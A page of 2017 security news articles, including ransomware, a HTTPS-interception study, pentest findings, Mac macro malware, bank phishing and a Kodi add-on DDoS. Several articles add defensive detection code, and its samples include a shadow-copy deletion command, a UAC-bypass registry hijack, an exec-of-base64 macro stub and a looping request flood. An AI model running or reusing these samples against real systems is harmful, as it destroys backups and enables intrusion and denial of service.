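    {"event": "RegistryValueSet",
     "target": r"HKU\S-1-5-21-1004336348-1177238915-682003330-1001\Software\Classes\mscfile\shell\open\command\(Default)",
     "details": r"C:\Users\victim\Downloads\g7Qx3kLm.exe"},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\eventvwr.exe",
     "parent_image": r"C:\Users\victim\Downloads\invoice.exe", "command_line": "eventvwr.exe"},
    {"event": "ProcessCreate", "image": r"C:\Users\victim\Downloads\g7Qx3kLm.exe",
     "parent_image": r"C:\Windows\System32\eventvwr.exe", "command_line": "g7Qx3kLm.exe"},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\vssadmin.exe",
     "parent_image": r"C:\Users\victim\Downloads\g7Qx3kLm.exe",
     "command_line": "vssadmin.exe delete shadows /all /quiet"},
    # Benign: a normal Event Viewer launch, which must not fire
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\mmc.exe",
     "parent_image": r"C:\Windows\System32\eventvwr.exe", "command_line": "mmc.exe eventvwr.msc"},
]

if __name__ == "__main__":
    for rule, evidence in detect_erebus_chain(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

The registry rule fires before anything elevated has run, which makes it the one worth paging on; the other two confirm the chain completed.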

The ransom note contains the user’s unique ID, a list of encrypted files, and a button that takes the victim to the Tor payment site, where payment instructions are provided. The requested ransom is 0.085 Bitcoin, around $90 at the moment, which is among the lowest demanded by ransomware families currently in circulation.


Forcepoint Acquires Skyfence from Imperva

9.2.2017 securityweek Cyber
Forcepoint, the cybersecurity firm created from the $1.9 billion combination of Raytheon and Websense, today announced that it has agreed to acquire the Skyfence business from Imperva.

Skyfence is a player in the hot cloud access security broker (CASB) market, and provides visibility and control over cloud applications such as NetSuite, Office 365, Salesforce, Workday, Dropbox, G Suite and Box.

Skyfence was originally acquired by Imperva in February 2014.

The acquisition by Forcepoint, which is expected to be complete during the first quarter of 2017, will allow Forcepoint to integrate its web security and data loss prevention (DLP) technologies with Skyfence’s technology to provide customers increased visibility, control and security over cloud applications.

The integration also provides Forcepoint customers greater flexibility in deploying web security via on-premise, hybrid and cloud-based solutions, Forcepoint said.

CASBs, which provide security and visibility for companies moving to the cloud, have experienced rapid growth, with several players in the space being acquired by larger enterprise technology firms.

In June 2016, Cisco announced its intention to acquire CloudLock, a privately held CASB based in Waltham, Massachusetts, for $293 million in cash and assumed equity awards. In 2015, Microsoft bought Adallom and turned it into its Cloud App Security service, launched in April 2016. In 2014 Imperva bought Skyfence; in 2015, Palo Alto Networks bought CirroSecure; and in November 2015 Blue Coat (since acquired by Symantec) bought Elastica.

Forcepoint previously entered into a licensing arrangement with Skyfence in March 2015 that enabled Skyfence’s Cloud App Catalog to be integrated into Forcepoint’s web security gateway products.

Skyfence employees will join the Forcepoint team, with the main Skyfence team remaining based in Ramat Gan, Israel, the company said.


The First Czech Secondary-School Cyber Security Competition

9.2.2017 SecurityWorld IT
The first round of the Czech Secondary-School Cyber Security Competition, organised by the AFCEA Cyber Security Working Group together with a number of state, academic and professional organisations, has concluded successfully.

Almost 1,100 people took part in the first round. 874 students from 162 secondary schools across the Czech Republic met all the competition criteria and were scored. 567 contestants from every region of the country advance to the second round; the South Moravian Region, Prague and the Vysočina Region will have the most representatives.

The first, "awareness" round showed a good general knowledge of cyber security among the students. Six students scored the maximum (40 points), and the average of 19.05 points across all scored students is a respectable result and surely strong motivation for the next round.

Students from various types of schools took part: not only technical schools and grammar schools, but also students from typically non-technical schools and fields of study, such as secondary schools of applied arts, nursing schools and hotel schools. Some schools "sent" only individuals to the competition, others whole groups of several dozen participants. The school with the most students in the competition was the Střední škola informatiky, poštovnictví a finančnictví Brno (Secondary School of Informatics, Postal Services and Finance).

It is difficult to rank the most successful schools, since there are many variables (the number of students entered with their best, average and worst results, the number of students advancing, and so on), and schools that entered fewer students are at a partial disadvantage. The Competition Committee nevertheless carried out such a ranking, and the five most successful schools in the Czech Republic were:

Střední průmyslová škola elektrotechnická a Vyšší odborná škola, Pardubice;
Střední průmyslová škola na Proseku, Praha;
Církevní Gymnázium Německého Řádu, Olomouc;
Integrovaná střední škola technická a ekonomická, Sokolov;
SŠ AGC a.s., Teplice.

Evaluation of the first round also included individual visits to schools, handing over diplomas in person and discussing cyber security with the students. Between 10 January and 3 February, members of the Competition Committee visited 31 schools, holding 29 discussions and lectures for more than 1,200 students and teachers.

The first round was scored by region and therefore had 14 groups of winners. The detailed results are published on the competition website, www.kybersoutez.cz. Students advancing to the second round received, as part of the prizes and accompanying materials, access to a range of cyber security study materials donated to the competition by a number of expert partners.

More thorough preparation will be needed for the second round, to be held in March of this year, since it will be more demanding, more technical and partly in English. Contestants will compete for a place in the national final, which will take place, with all finalists and their escorts attending in person, on 1 June 2017 in Brno as part of the IDET 2017 international defence and security technology trade fair.


HTTPS Security Weakened by AV Products, Middleboxes: Study

8.2.2017 Securityweek Analysis
An increasing number of antivirus products and network appliances intercept TLS connections to gain visibility into encrypted traffic, but in many cases this weakens connection security and introduces vulnerabilities, according to a new study.

The study, focusing on the security impact of HTTPS interception, was carried out last summer by researchers at Mozilla, Google, CloudFlare, the University of Michigan, the University of Illinois Urbana-Champaign, the University of California Berkeley, and the International Computer Science Institute.

The experts analyzed the TLS handshakes produced by web browsers, security products and malware, and built a set of heuristics that let a web server detect HTTPS interception and identify the product responsible. The idea is that an intercepting proxy terminates the browser’s connection and opens its own to the server, so the ClientHello the server sees carries the proxy’s cipher suites and extensions rather than those of the browser named in the HTTP User-Agent header.

Tests were conducted by deploying these heuristics on Mozilla’s Firefox update servers, the CloudFlare content distribution network (CDN), and some major e-commerce websites. The analysis showed that 4% of the Firefox connections, 6.2% of the e-commerce connections, and nearly 11% of US-based CloudFlare connections were intercepted.

Worryingly, 97% of the Firefox, 54% of the CloudFlare and 32% of the e-commerce connections that were intercepted became less secure. More than 62% of the middlebox connections were weakened and over 58% had severe vulnerabilities.

“Alarmingly, not only did intercepted connections use weaker cryptographic algorithms, but 10–40% advertised support for known-broken ciphers that would allow an active man-in-the-middle attacker to later intercept, downgrade, and decrypt the connection,” researchers said in their report.

The list of middlebox vendors whose products were tested includes A10 Networks, Blue Coat, Barracuda, Check Point, Cisco, Forcepoint, Fortinet, Juniper Networks, Microsoft, Sophos, Untangle and WebTitan. Only the Blue Coat product received an A grade (optimal TLS connection equivalent to modern browsers), while the others received a C (contains known vulnerability) or F (severely broken connection vulnerable to MitM attacks).
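One way a web server could apply the study’s approach, as an added example that is not the researchers’ published heuristics or code: parse the raw ClientHello the server received, compare the offered cipher suites with the fingerprint the browser named in the User-Agent header would have sent, and grade the handshake by its weakest cipher. The `EXPECTED` fingerprint table and the A/C/F thresholds are simplified assumptions made for this example, not the paper’s measured per-browser fingerprints; `build_client_hello` exists only to construct test input.

```python
"""Added example (not from the study or any vendor): detect HTTPS interception by
comparing a TLS ClientHello with the fingerprint the claimed browser would send,
then grade the handshake by the weakest cipher suite it advertises."""
import struct

# Cipher suite IDs from the IANA registry. Modern AEAD suites a current browser offers.
MODERN = [0xC02B, 0xC02F, 0xC02C, 0xC030, 0xCCA9, 0xCCA8]
# Known-broken suites (NULL, export-grade, RC4, single DES): an active MitM can exploit these.
BROKEN = {0x0000, 0x0001, 0x0002, 0x0003, 0x0004, 0x0005, 0x0006, 0x0008, 0x0009}
# Legacy suites (3DES, static-RSA AES-CBC): known weaknesses, but not trivially broken.
LEGACY = {0x000A, 0x002F, 0x0035}

# Assumed fingerprints keyed by User-Agent family. Constructed for this example;
# a real deployment derives them from observed handshakes of each browser version.
EXPECTED = {"Firefox": tuple(MODERN), "Chrome": tuple(MODERN)}


def build_client_hello(cipher_suites, extensions=(0, 10, 11, 13, 16)):
    """Construct a minimal TLS 1.2 ClientHello record (test input only)."""
    body = struct.pack("!H", 0x0303) + bytes(32) + b"\x00"          # version, random, empty session id
    body += struct.pack("!H", 2 * len(cipher_suites))
    body += b"".join(struct.pack("!H", c) for c in cipher_suites)
    body += b"\x01\x00"                                              # one compression method: null
    ext = b"".join(struct.pack("!HH", t, 0) for t in extensions)    # extension types with empty bodies
    body += struct.pack("!H", len(ext)) + ext
    hs = b"\x01" + len(body).to_bytes(3, "big") + body             # handshake header: client_hello
    return b"\x16\x03\x03" + struct.pack("!H", len(hs)) + hs         # record header


def parse_client_hello(data):
    """Return (cipher_suites, extension_types) from a raw ClientHello record."""
    if data[0] != 0x16 or data[5] != 0x01:
        raise ValueError("not a ClientHello")
    pos = 9 + 2 + 32                                  # record + handshake headers, version, random
    sid_len = data[pos]
    pos += 1 + sid_len
    cs_len = struct.unpack_from("!H", data, pos)[0]
    pos += 2
    ciphers = [struct.unpack_from("!H", data, pos + i)[0] for i in range(0, cs_len, 2)]
    pos += cs_len
    comp_len = data[pos]
    pos += 1 + comp_len
    ext_types = []
    if pos < len(data):
        ext_len = struct.unpack_from("!H", data, pos)[0]
        pos += 2
        end = pos + ext_len
        while pos < end:
            ext_type, ext_body_len = struct.unpack_from("!HH", data, pos)
            ext_types.append(ext_type)
            pos += 4 + ext_body_len
    return ciphers, ext_types


def grade(ciphers):
    """Simplified A/C/F scale: F if any broken suite is offered, C if only legacy ones."""
    if any(c in BROKEN for c in ciphers):
        return "F"
    if any(c in LEGACY for c in ciphers):
        return "C"
    return "A"


def assess(user_agent, client_hello):
    """Flag interception when the hello does not match the fingerprint of the claimed browser."""
    family = next((f for f in EXPECTED if f in user_agent), None)
    ciphers, _ = parse_client_hello(client_hello)
    intercepted = family is not None and tuple(ciphers) != EXPECTED[family]
    return {"intercepted": intercepted, "grade": grade(ciphers)}
```

A mismatch is a strong hint rather than proof, since some legitimate clients share User-Agent strings; the paper’s value comes from the fingerprint table being derived from real browser handshakes, version by version.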

Security of TLS Interception Middleboxes

The antivirus products analyzed in the study include Windows and Mac products from Avast, AVG, Bitdefender, Bullguard, CYBERsitter, Dr. Web, ESET, G DATA, Kaspersky, KinderGate, Net Nanny, PC Pandora and Qustodio. Only two of the tested Avast products received an A grade.

The researchers said they reported their findings to the affected vendors, and while some of them addressed the issues or they plan on doing so, others ignored them or refused to update their products and shifted responsibility to customers.

The study was published shortly after a member of the Chrome security team and a former Mozilla employee said the only antivirus that is not terrible is the one made by Microsoft.


Two-thirds of Enterprises Usually Breached by White Hat Hackers

8.2.2017 Securityweek Hacking
Analysis of 128 penetration tests conducted in the fourth quarter of 2016 shows that approximately two-thirds of tested companies were successfully breached. This is despite the limited time -- in 89% of cases, less than two weeks -- available to the pentesters compared to the effectively unlimited time available to blackhat attackers.

Rapid7, which was appointed a CVE numbering authority in December 2016, analyzed 128 of the engagements it undertook in the closing months of last year. These involved both internal and external testing. Most clients opted for external testing (67.2%) over internal testing (21.1%). A few (8.6%) combined both, while a smaller number of tests (3.1%) were neither (code and IoT audits, for example).

External pentests involved testing web sites, phishing, VPNs and so on. Internal tests looked at, for example, network misconfigurations, software, and wifi. Although there were fewer internal tests, states Rapid7, "Overall, penetration testers successfully compromised the target organization through software vulnerabilities or network misconfigurations just over 80% of the time."

The good news, it added, is that "most of the techniques used can be defended against with sensible, widely understood and appropriately tailored network security best practices, including patch management, network segmentation, and regular assessments of the most likely sources of risk in the enterprise."

Pentesters are usually asked to evaluate protection in specific areas. Unsurprisingly, given the increasing scope of regulations, the most frequent request (57% of the companies tested) is to test against the theft of personally identifiable information (PII). This is followed by sensitive internal data at 55.5%. And yet, "despite the recent uptick in online industrial espionage, the surveyed organizations seemed the least interested in specifically protecting copyrighted material [2.3%], digital certificates [3.1%], source code [9.4%], or trade secrets [13.1%]."

It is tempting to infer from this that compliance pressures are focusing defense of PII over purely business secrets. Indeed, Rapid7 director of research, Tod Beardsley, told SecurityWeek, "It was surprising that companies are focusing so much attention on protecting PII, given that real criminals have such a variety of goals, including an increased interest in industrial espionage. We do think that this is due to compliance requirements that mandate PII protections, and therefore, organizations are dedicating their limited resources to making sure their PII story is solid. This is certainly rational, but we worry that organizations are growing too focused on PII protections while criminals are expanding their areas of interest."

The report highlights the value of protecting credentials. "The number one method of obtaining account access," it states, "starts with very simple password guessing; enforcing more machine-generated, rather than human-generated, passwords would go a long way toward defending against this threat, as would more widespread adoption of two-factor authentication."

Rapid7 outlines the methods it uses to 'acquire' client credentials. The most common, and the most successful, is manual guesswork. "Here's a time-saving tip," it comments: "If you know a lot of, or all, usernames, just try <Current season><current year>. People love that password, and according to our survey data, manually guessing patterns like this is successful a surprising (depressing?) fraction of the time."

The two most common methods of defending credentials are account lock-outs and two-factor authentication. However, 32.8% of enterprises did not use lockouts, while for another 42.2% the lockout had no effect or simply delayed the compromise. Rapid7 points out that 14% of the surveyed sites also lacked detection controls. "Combined with a lack of effective lockouts, this is a prescription for inevitable compromise."

2FA is a more successful method of protecting credentials, but is surprisingly rare. "2FA is generally effective in preventing the most common forms of credential compromise, especially when combined with a reasonable detection control like user behavior analytics," says Rapid7.

Once an account is compromised, both pentesters and attackers will seek to locate and use more privileged credentials. Such a process is described in one of several case studies outlined in the report. This client was a technology company. Rapid7 detailed "how good information gathering, coupled with precise password sprays, can ultimately result in going from an unauthenticated nobody on the internet, to an authenticated user on the Domain, and ultimately to a Domain Administrator."

The first step was to search the internet for names or usernames and the potential username format. "This username enumeration technique produced several valid accounts in the domain, which were then re-run through a brute-force attack against the OWA installation using that favorite password of pen testers, <CurrentSeason><CurrentYear>. This attack produced several valid credential pairs."

2FA was in use on a VPN endpoint, but Rapid7 bypassed it by changing the e-mail address on a compromised account to one controlled by Rapid7 and then using the VPN's self-service enrollment feature to register its own second factor. This got the pentesters into the network, and they then scanned the internal hosts until they found an old Group Policy Preferences file containing service account credentials vulnerable to trivial decryption. The "cpassword" values in such files are encrypted with a fixed AES key that Microsoft itself published, so anyone who can read the file from SYSVOL can recover the plaintext; MS14-025 removed the ability to set new ones, but old files linger. "This user was a Domain Administrator on the network," reports Rapid7, "and therefore Rapid7 had fully compromised this domain upon connecting to the domain controller with this account."
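The lockout discussion above and the OWA spray in the case study describe the same shape of attack: one guessable password such as Winter2017 tried once against many accounts, so per-account lockout never fires. The following added example (not Rapid7's tooling) shows the detection control the report says most sites lacked: it reads a constructed, simplified authentication log and alerts on a source that touches many distinct accounts within a window while keeping each account under the lockout threshold. The log format and thresholds are assumptions for this example.

```python
"""Added example (not Rapid7's code): spot a password spray in authentication logs.
A spray stays under per-account lockout thresholds, so the signal is one source
hitting many distinct accounts in a short window with few attempts on each."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample log in a simplified "timestamp user source result" form.
# 203.0.113.7 sprays eight accounts once each; 198.51.100.9 is a user fumbling their own password.
SAMPLE_LOG = """\
2017-02-12T00:15:01 alice 203.0.113.7 FAIL
2017-02-12T00:15:02 bob 203.0.113.7 FAIL
2017-02-12T00:15:03 carol 203.0.113.7 FAIL
2017-02-12T00:15:04 dave 203.0.113.7 FAIL
2017-02-12T00:15:05 erin 203.0.113.7 FAIL
2017-02-12T00:15:06 frank 203.0.113.7 FAIL
2017-02-12T00:15:07 grace 203.0.113.7 OK
2017-02-12T00:15:08 heidi 203.0.113.7 FAIL
2017-02-12T00:20:00 alice 198.51.100.9 FAIL
2017-02-12T00:20:05 alice 198.51.100.9 FAIL
2017-02-12T00:20:09 alice 198.51.100.9 OK
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (OK|FAIL)$")


def season_year_candidates(year):
    """The guessable pattern the report names, <Season><Year>, with and without a trailing '!'."""
    seasons = ["Winter", "Spring", "Summer", "Fall", "Autumn"]
    return [f"{s}{year}" for s in seasons] + [f"{s}{year}!" for s in seasons]


def parse(log_text):
    """Turn log lines into (timestamp, user, source, result) tuples; skip malformed lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, user, src, result = m.groups()
            events.append((datetime.fromisoformat(ts), user, src, result))
    return events


def detect_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=3):
    """Return {source: alert} for sources that, within `window`, try at least `min_users`
    distinct accounts while never exceeding `max_per_user` attempts on any one of them
    (the lockout-evading shape). The alert lists accounts where a guess succeeded."""
    by_src = defaultdict(list)
    for ts, user, src, result in sorted(events):
        by_src[src].append((ts, user, result))
    alerts = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window forward
                start += 1
            per_user = defaultdict(int)
            for _ts, user, _result in evs[start:end + 1]:
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                successes = sorted({u for _ts, u, r in evs[start:end + 1] if r == "OK"})
                alerts[src] = {"accounts_tried": len(per_user), "compromised": successes}
    return alerts
```

A lockout threshold of five bad attempts per account never trips here, because each account sees exactly one attempt; keying the detection on the source and on the number of distinct accounts catches the burst, and pairing it with 2FA turns the one successful guess into a failed second factor.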

Rapid7 is concerned at the consistency with which it can compromise its clients. There seems to be no difference between small companies with a small attack surface, and large enterprises with a large attack surface. "Over two-thirds of [our] penetration testers remain undetected," it concludes. "Beyond network segmentation, patch management, or any other technical countermeasure, a routine malicious behavior detection strategy that is at least able to catch these frenetic bursts of malicious activity is the best technical protection solution money can buy today."


Macro Malware Comes to macOS

8.2.2017 Securityweek Virus
After becoming a common occurrence on Windows-based computers over the past few years, malware that abuses macro-enabled Microsoft Office documents to spread is now targeting macOS users too.

Malicious macros in Office documents have been used to spread malware for over a decade, but their use dropped significantly after Microsoft disabled macros by default in Office 2007. A couple of years ago, however, the use of such macros recommenced, as cybercriminals started leveraging various social engineering techniques to trick users into enabling the macros.

Until now, only Windows users were targeted in such attacks, but it appears that actors building malware for Mac systems also decided to adopt the technique recently. According to Patrick Wardle, Director of Research at Synack, such an attack was recently carried out via a Word document named “U.S. Allies and Rivals Digest Trump’s Victory - Carnegie Endowment for International Peace.docm.”

By using ClamAV's sigtool to extract the embedded macros, the researcher found Python code designed to perform a series of checks on the potential victim’s machine before fetching and executing the malicious payload. As soon as the user opens the document in Word for Mac with macros enabled, the Fisher function is executed automatically.

The Fisher function decodes a base64 chunk of data and then executes it via Python. The Python code, which appears to have been copied from the open-source EmPyre project, checks that the LittleSnitch host firewall is not running, downloads the second-stage payload (from hxxps[:]//www.securitychecking.org:443/index[.]asp), RC4-decrypts it and executes it.
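Static triage of a macro like the one described, as an added example that is not Patrick Wardle's tooling: given macro source already extracted from the .docm (with ClamAV's sigtool, or oletools' olevba), the script finds the auto-run entry point, finds base64 blobs handed to an interpreter, decodes them without executing anything, and reports the indicators the analysis mentions (a LittleSnitch check, a download URL, RC4). The sample macro and its embedded payload are constructed for this example; the payload is an inert placeholder that merely contains the indicator strings.

```python
"""Added example (not from the analysis): static triage of macro source extracted
from a .docm. Nothing in the document is executed; base64 blobs are only decoded."""
import base64
import binascii
import re

AUTO_RUN = re.compile(r"\bSub\s+(AutoOpen|Document_Open|AutoExec|Workbook_Open)\b", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
INTERPRETER = re.compile(r"\b(python|osascript|curl|sh|bash)\b", re.I)
# Strings that mark the stages described: firewall/sandbox check, staging URL, decryption.
INDICATORS = ["LittleSnitch", "http", "RC4", "exec(", "urllib", "Keychain"]

# Constructed sample: an AutoOpen macro whose Fisher routine hands a base64 chunk to python.
# The embedded payload is an inert placeholder, never run by this tool.
_PAYLOAD = b"""# placeholder stage-1 (constructed; does nothing)
checks = ["LittleSnitch"]; stage2 = "https://example.invalid/index.asp"; cipher = "RC4"
"""
SAMPLE_MACRO = f'''Sub AutoOpen()
    Fisher
End Sub
Sub Fisher()
    Dim cmd As String
    cmd = "python -c ""import base64;exec(base64.b64decode('{base64.b64encode(_PAYLOAD).decode()}'))"""
    Shell cmd, vbHide
End Sub
'''


def decode_blobs(text):
    """Base64-decode every long blob that yields printable text; ignore the rest."""
    out = []
    for m in B64_BLOB.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
            decoded = raw.decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in decoded):
            out.append(decoded)
    return out


def triage(macro_text):
    """Summarise auto-run hooks, interpreters invoked, decoded blobs and indicators found."""
    report = {
        "auto_run": sorted({m.group(1) for m in AUTO_RUN.finditer(macro_text)}),
        "interpreters": sorted({m.group(1).lower() for m in INTERPRETER.finditer(macro_text)}),
        "decoded": decode_blobs(macro_text),
        "indicators": [],
    }
    hits = set()
    for blob in report["decoded"]:
        hits.update(i for i in INDICATORS if i in blob)
    report["indicators"] = sorted(hits)
    # An auto-run hook that hands decoded data to an interpreter is the described pattern.
    suspicious = report["auto_run"] and report["interpreters"] and report["decoded"]
    report["verdict"] = "suspicious" if suspicious else "clean"
    return report
```

The verdict rule is deliberately narrow (auto-run plus interpreter plus an encoded blob); a real triage pipeline would also extract the document's VBA with olevba and submit decoded payloads to further analysis rather than stop at string indicators.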

While EmPyre is a known open-source multi-stage post-exploitation agent “built on cryptologically-secure communications,” it’s unknown what the second-stage payload included, as the file wasn’t available during analysis. While it might have been another EmPyre component, this payload could have been something entirely different as well.

“The second-stage component of Empyre is the persistent agent that affords a remote attacker continuing access to an infected host,” the researcher says. Persistence would likely be achieved through one of the mechanisms EmPyre supports: a cron job, a dylib hijack, a launch daemon or a login hook.

“The persistent component of EmPyre can also be configured to run a wide range of EmPyre modules. These modules allow the attacker to perform a myriad of nefarious actions such as enabling the webcam, dumping the keychain, and accessing a user's browser history,” the researcher notes.

The IP associated with the securitychecking(.)org website that hosts the malicious payload appears to be geolocated in Russia and was previously associated with phishing.

While the malware used in this attack isn’t particularly advanced, as it relies on user interaction to open the malicious document in Microsoft Word and enable macros, it also uses an open-source implant that is likely to be easily detected. However, the use of social engineering is noteworthy, especially since it exploits the weakest link in the chain, namely the human element.

“And moreover, since macros are 'legitimate' functionality (vs. say a memory corruption vulnerability), the malware's infection vector doesn't have to worry about crashing the system nor being 'patched' out,” the researcher concludes.


Česká spořitelna warns: attackers are using a new trick with the address bar
8.2.2017 Živě.cz Phishing
Phishing has been rampant in recent weeks. Fio banka, ČSOB and Alza have warned their clients of attacks, as has Google in connection with Gmail. Now Česká spořitelna has joined them, having recorded a new wave of attacks in which the attackers use a new method to confuse users.

Everything again starts with an e-mail urging the user to view an important message in internet banking. Clicking the link takes them to a fraudulent login page posing as the genuine web account management. The credentials entered naturally end up in the attackers' database. This time they also try to extract the authorisation code delivered by SMS.

The user first receives an e-mail containing a link to an important message in internet banking. They are then redirected to a fraudulent page posing as internet banking (photo: Česká spořitelna)

What is new is a trick that disguises the address of the fake site using a so-called data URI, which allows a piece of source code to be written into the address itself. As a result the address bar can even contain the familiar text servis24.cz. What should alert users above all is the absence of a secure connection, which browsers indicate with a green padlock icon: a data: URL is not served by any host, so no certificate is presented and no padlock can appear.
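The check a mail gateway or browser extension could apply to such a link, as an added example that is not the bank's or Živě.cz's code: a data: URI can carry arbitrary text such as "servis24.cz" in the part the address bar shows, before its real base64 payload, so the classifier keys on the scheme and on the actual host rather than on what the bar displays. The `BRAND_HOSTS` table and the sample links are assumptions constructed for this example.

```python
"""Added example (not the bank's code): classify a link from an e-mail by scheme and
real host, decoding data: URIs to show where the spoofed bank name actually sits."""
import base64
from urllib.parse import unquote, urlsplit

# Assumed legitimate domains for the brand; a real deployment loads these from config.
BRAND_HOSTS = {"servis24.cz": "servis24.cz", "csas.cz": "csas.cz"}

# Constructed sample: a data: URI whose media-type part shows the bank's name before
# the base64 payload (the part the address bar truncates away).
FAKE_PAGE = "<html><form action='https://collector.invalid/post'>login</form></html>"
PHISH = ("data:text/html;https://www.servis24.cz/ebanking;base64,"
         + base64.b64encode(FAKE_PAGE.encode()).decode())


def host_matches(host, domain):
    """True for the domain itself and its subdomains only (not 'servis24.cz.evil.invalid')."""
    return host == domain or host.endswith("." + domain)


def data_uri_payload(url):
    """Return the decoded body of a data: URI (base64 or percent-encoded)."""
    header, _, body = url[5:].partition(",")
    if header.lower().endswith(";base64"):
        padded = body + "=" * (-len(body) % 4)
        return base64.b64decode(padded).decode("utf-8", "replace")
    return unquote(body)


def classify_link(url):
    """Return (verdict, reasons): 'ok', 'suspicious', 'phishing' or 'unknown'."""
    reasons = []
    if url.lower().startswith("data:"):
        reasons.append("data: URI used as a page")
        header = url.split(",", 1)[0]
        body = data_uri_payload(url)
        for brand in BRAND_HOSTS:
            if brand in header or brand in body:
                reasons.append(f"brand name {brand} embedded in data: URI")
        return "phishing", reasons
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme != "https":
        reasons.append("no TLS (no padlock)")
    if any(host_matches(host, d) for d in BRAND_HOSTS.values()):
        return ("ok" if not reasons else "suspicious"), reasons
    spoofed = [b for b in BRAND_HOSTS if b in url.lower()]
    for brand in spoofed:
        reasons.append(f"brand {brand} appears in URL but host is {host!r}")
    if spoofed:
        return "phishing", reasons
    return ("suspicious" if reasons else "unknown"), reasons
```

The browser shows the beginning of the data: URL, which is exactly where the attacker put the bank's name; the page the victim sees is the base64 tail, and the form in it posts to a host the bank does not control.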

Česká spořitelna asks users to forward fraudulent e-mails to phishing@csas.cz and recommends contacting the customer line immediately if credentials have already been entered into the fake form.


The author of a well-known Kodi add-on wanted to settle scores, so he built a DDoS into it
8.2.2017 Živě.cz Hacking

The scene around the popular Kodi media player went through an unpleasant affair in recent days. The author of Exodus, one of the popular add-ons used to stream films and series from the internet, wanted to use its huge user base to settle scores with his critics and built an attempted DDoS into the add-on's code.

The Kodi media player on Android TV

According to TorrentFreak, the author of Exodus, who went by the nickname Lambda online, was in a dispute with certain critics who wanted to expose his real identity. Lambda, as the author of a piracy add-on, feared this, and so in an update he placed a few lines of commands into the Exodus code that cyclically fetched web addresses belonging to his adversaries.

Python code that performed HTTP GET requests in a loop. With the add-on's large user count, the author hoped to cause trouble and flood the web server.

Inquisitive users do not miss much, though, and they soon began asking why the add-on tried to open about forty web connections in the background every time they started streaming anything through it.

Lambda eventually had to admit that he wanted to harm his critics, and he changed the function into an opt-in for his supporters. But he had gone too far, discredited the whole scene and lost his account in the add-on repository. In the end he effectively left Kodi.

Kodi home cinema on Android TV

The whole case is a reminder that when installing any third-party code we must always bear in mind that an untrustworthy author can abuse it. It need not always be malware that harms us noticeably; it can be, as in this case, an attempt to enlist us in a DDoS attack.
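A pre-install audit that would have surfaced this behaviour, as an added example that is neither Kodi's nor the add-on's code: Kodi add-ons are Python, so the auditor parses the add-on source with `ast`, lists every URL literal and every HTTP call, and flags calls that run inside a loop or point at hosts outside the add-on's declared allowlist. The sample add-on fragment mirrors the described shape (a loop hitting unrelated sites on every playback) with constructed, non-existent target hosts.

```python
"""Added example (not from the Kodi project): static audit of a third-party Python
add-on for network calls in loops and for URLs outside a declared host allowlist."""
import ast
from urllib.parse import urlsplit

# Call names treated as HTTP entry points (urllib.request.urlopen, requests.get/post/request).
HTTP_CALLS = {"urlopen", "get", "post", "request"}

# Constructed add-on fragment resembling the described behaviour; hosts are fictitious.
SAMPLE_ADDON = '''
import urllib.request
API = "https://addon-api.example/resolve"
TARGETS = ["http://critic-one.invalid/", "http://critic-two.invalid/"]

def resolve(title):
    return urllib.request.urlopen(API + "?q=" + title).read()

def on_play(title):
    for _ in range(40):
        for url in TARGETS:
            try:
                urllib.request.urlopen(url, timeout=1)
            except Exception:
                pass
    return resolve(title)
'''


def audit_addon_source(source, allowed_hosts):
    """Return human-readable findings: off-allowlist URL literals and HTTP calls, with
    a note on whether each call sits inside a for/while loop."""
    tree = ast.parse(source)
    findings = []

    # 1. Every string literal that looks like a URL, checked against the allowlist.
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str) and "://" in node.value:
            host = urlsplit(node.value).hostname or ""
            if host not in allowed_hosts:
                findings.append(f"line {node.lineno}: URL to non-allowlisted host {host}")

    # 2. Collect every node that lives inside a loop body.
    in_loop = set()
    for node in ast.walk(tree):
        if isinstance(node, (ast.For, ast.While)):
            in_loop.update(id(child) for child in ast.walk(node))

    # 3. HTTP calls, annotated with their loop context.
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            func = node.func
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
            if name in HTTP_CALLS:
                where = "inside a loop" if id(node) in in_loop else "outside loops"
                findings.append(f"line {node.lineno}: HTTP call {name}() {where}")
    return findings
```

Matching on call names is deliberately coarse (a dictionary's `.get()` will also be listed), which is acceptable for a review aid whose job is to make a human look; URLs assembled at runtime or fetched from a remote config will not appear as literals and need a dynamic check such as watching the add-on's connections.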


Internet monitoring by Military Intelligence: a step in the right direction
8.2.2017 Lupa.cz BigBrother

At today's session of the Security Committee, MPs added several important proposals, pointing in a positive direction, to the amendment of the Military Intelligence Act.
I have commented on the amendment to the Military Intelligence Act (VOZ) several times already, so there is probably no need to repeat that I am not a great fan of this bill. Personally, I think the artificial split between cyber security and cyber defence, and the linking of this topic to an intelligence service, is a very bad idea. I also spoke out strongly against VOZ being able to technically capture all internet traffic data. The safeguard in the law, a declaration that VOZ would not concern itself with content, struck me as weak. Likewise, it bothers me that experts outside VOZ or the Ministry of Defence would not be invited to the discussion on deploying the relevant equipment.

Today's session of the Security Committee brought mildly good news. First, the proposed amendment says that VOZ will only be able to obtain metadata. In plain language this means VOZ will "see" only the headers (envelopes) of messages, not their content. In practice it means that it will see, for example, that two mail servers exchanged a message, but not from whom to whom or what was in it. It may also be able to see that someone at a specific IP address accessed the website of, say, Seznam, CZ.NIC or servers with adult content.

